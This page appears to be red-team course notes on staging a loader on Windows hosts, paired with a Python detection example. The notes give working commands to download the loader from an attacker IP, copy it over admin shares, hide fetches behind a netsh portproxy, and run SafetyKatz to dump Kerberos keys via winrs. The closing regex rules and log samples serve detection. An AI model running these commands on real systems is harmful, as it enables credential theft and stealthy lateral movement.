File Transfers

Save the loaders to C:\Users\Public, as using any of the temp directories is noisy.

iwr http://172.16.100.1/Loader.exe -o C:\Users\Public\Loader.exe

If we have admin access to another machine, we can use xcopy to move the file over the C$ admin share:

echo F | xcopy C:\Users\Public\Loader.exe \\server1\C$\Users\Public\Loader.exe

The echo F answers xcopy's prompt asking whether the destination name is a file (F) or a directory (D).

To avoid detection and still receive output, we can port forward port 8080 on the compromised machine to port 80 on our attacking machine.

This way, when using the Loader, the fetch looks like it comes from the local machine (127.0.0.1) rather than from an external host.

netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.1
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe sekurlsa::ekeys exit

The same steps, done without an interactive shell, using winrs:

$null | winrs -r:server1 "netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.1"
$null | winrs -r:server1 "C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe sekurlsa::ekeys exit"
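
A defender-side check for the steps above, added here as an example and not part of the original page: it runs a handful of constructed process-creation log lines (Sysmon Event ID 1 style; hostnames, IPs and paths reuse the page's own values, plus two benign controls) through one rule per step, then correlates the portproxy addition with the loopback fetch per host, since the two together are the pattern this page describes.

```python
import re
from collections import defaultdict

# Constructed Sysmon Event ID 1 style process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"host": "ws01", "image": "powershell.exe",
     "cmd": r"powershell iwr http://172.16.100.1/Loader.exe -o C:\Users\Public\Loader.exe"},
    {"host": "ws01", "image": "cmd.exe",
     "cmd": r"cmd /c echo F | xcopy C:\Users\Public\Loader.exe \\server1\C$\Users\Public\Loader.exe"},
    {"host": "server1", "image": "netsh.exe",
     "cmd": "netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 "
            "connectport=80 connectaddress=172.16.100.1"},
    {"host": "server1", "image": "Loader.exe",
     "cmd": r"C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe sekurlsa::ekeys exit"},
    {"host": "ws01", "image": "winrs.exe",
     "cmd": 'winrs -r:server1 "netsh interface portproxy add v4tov4 listenport=8080 '
            'listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.1"'},
    {"host": "ws02", "image": "netsh.exe", "cmd": "netsh advfirewall show allprofiles"},   # benign
    {"host": "ws02", "image": "xcopy.exe", "cmd": r"xcopy C:\Reports D:\Backup\Reports /E"},  # benign
]

# One rule per step of the tradecraft on the page.
RULES = [
    ("portproxy_add",        re.compile(r"\bnetsh\s+interface\s+portproxy\s+add\b", re.I)),
    ("download_to_public",   re.compile(r"\b(iwr|invoke-webrequest|curl|certutil)\b.*C:\\Users\\Public\\", re.I)),
    ("admin_share_copy",     re.compile(r"\b(xcopy|copy|robocopy)\b.*\\\\[^\\]+\\[a-z]\$\\", re.I)),
    ("loopback_proxy_fetch", re.compile(r"https?://127\.0\.0\.1:\d+/", re.I)),
    ("winrs_remote_exec",    re.compile(r"\bwinrs(\.exe)?\s+-r:", re.I)),
]

def classify(cmd):
    """Names of every rule the command line matches, in RULES order ([] for benign lines)."""
    return [name for name, rx in RULES if rx.search(cmd)]

def scan(events):
    """(host, image, tags) for each event matching at least one rule; benign events drop out."""
    return [(ev["host"], ev["image"], t) for ev in events if (t := classify(ev["cmd"]))]

def hosts_with_proxy_chain(events):
    """Hosts where a portproxy was added AND a process fetched through 127.0.0.1:<port>.
    Note the winrs line tags portproxy_add on ws01 although the proxy lands on server1,
    so only server1 shows the full chain in the sample."""
    seen = defaultdict(set)
    for host, _image, tags in scan(events):
        seen[host].update(tags)
    return sorted(h for h, t in seen.items() if {"portproxy_add", "loopback_proxy_fetch"} <= t)
```

On a live host the persisted proxy rules themselves can be listed with `netsh interface portproxy show all`; they are stored under HKLM\SYSTEM\CurrentControlSet\Services\PortProxy, which is worth baselining since such entries survive reboots.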
